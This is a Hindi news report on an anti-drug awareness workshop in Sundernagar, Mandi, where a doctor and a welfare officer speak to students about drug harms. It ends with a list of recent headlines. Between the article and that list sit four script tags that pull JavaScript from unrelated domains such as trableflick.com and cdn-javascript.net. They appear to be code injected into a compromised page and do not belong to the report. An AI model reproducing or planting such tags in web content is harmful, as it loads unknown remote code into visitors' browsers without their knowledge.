Categories: हिमाचल

सुंदरनगर में सीआरसी द्वारा नशा निवारण कार्यशाला का किया गया आयोजन

<p>जिला मंडी में संस्कार एवं परामर्श केंद्र सुंदरनगर के तत्वावधान से वीरवार को सीआरसी के सुंदरनगर में एक नशा निवारण कार्यशाला का आयोजन किया गया। इसमें बतौर मुख्य वक्ता सिविल अस्पताल सुंदरनगर डॉ. अनूप और तहसील कल्याण अधिकारी विक्रांत मोहन जग्गा ने सभी छात्रों को नशे के कुप्रभाव के बारे जानकारी दी। डॉ. अनूप ने नशे के प्रकार के बारे और किस प्रकार यह शरीर में बुरा असर करते हैं, को लेकर विस्तृत जानकारी देने के साथ इसका समाधान भी बताया। उन्होंने कहा कि हेरोइन जैसे नशे के उपयोग में आजकल युवाओं में एड्स जैसी जानलेवा बीमारी भी फैल रही है।</p>

<p>इसके साथ ही विक्रांत मोहन जग्गा ने अपने वक्तव्य में संगत के असर के बारे में कहा कि नशा कहां से सबसे पहले उत्पन्न होता है और अगर जिस को नशे की लत लग जाए। वह परिवार और समाज में दुष्प्रभाव ही पैदा करता है। उन्होंने युवाओं को ड्रग फ्री समाज की परिकल्पना के बारे में कई उदाहरण दिए गए। उन्होंने कहा कि नशा और उसको करने वालों के बारे में जानकारी छुपानी नहीं चाहिए।</p>

<p>संस्कार एवं परामर्श केंद्र के संचालक आचार्य रोशन ने सभी को नशा निवारण पर शपथ दिलाई। सीआरसी के मनजीत सिंह सैनी ने भी नशा निवारण पर अपना वक्तव्य रखा और लोगों को जागरूक करने के लिए सीआरसी की ओर से भविष्य में रैलियों का भी आयोजन किया जाएगा। इस अवसर पर उपस्थित विद्यार्थियों द्वारा वक्ताओं से नशे को लेकर सवाल भी किए गए और उनका समाधान बताया गया।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1577963518284″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

14 mins ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

28 mins ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

35 mins ago

मंडी में हिमाचल ग्रामीण बैंक कर्मचारियों का विरोध प्रदर्शन, मांगों को लेकर गरजे

  Mandi: हिमाचल ग्रामीण बैंक कर्मचारियों द्वारा विभिन्न मांगों को लेकर सोमवार को हिमाचल प्रदेश…

40 mins ago

कांगड़ा बनेगा वल्चर सेफ जोन, गिद्धों के संरक्षण की पहल

Hamirpur: कांगड़ा जिले में गिद्धों के 506 नए घोंसले मिलने के बाद इसे वल्चर सेफ…

51 mins ago

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

4 hours ago